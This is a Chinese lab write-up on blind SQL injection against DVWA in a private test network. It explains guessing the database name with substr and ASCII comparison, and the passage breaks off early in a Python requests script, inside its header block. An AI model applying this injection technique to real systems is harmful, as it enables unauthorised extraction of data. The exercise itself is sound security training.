目的
理解SQL盲注的原理、方法、过程。利用不同数据库特有的函数进行探测,从而获取信息。
环境
系统:Kali Linux 2019(IP:10.10.10.128)
平台:OWASPBWA v0.94中的DVWA(IP:10.10.10.131)
界面
操作
现在想利用substr函数对数据库名进行猜解,将字符转化为ACSII值逐位比较。
语法
substr(strings,offset,length)
- strings:必选项,数据库中截取的字段
- offset:必选项,对strings的开始位置
- length:必选,要截取的长度
Python代码
探查数据库名
import requests
import re
header={
"Host":"10.10.10.131",
"User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0",
"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language":"en-US,en;q=0.5",
"Accept-Encoding":"gzip, deflate",
"Cookie":"security=low; PHPSESSID=vr7sjjt900ulgougqr1asmb346; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada",
"Connection":"close",
"Upgrade-Insecure-Requests":"1",
"Cache-Control":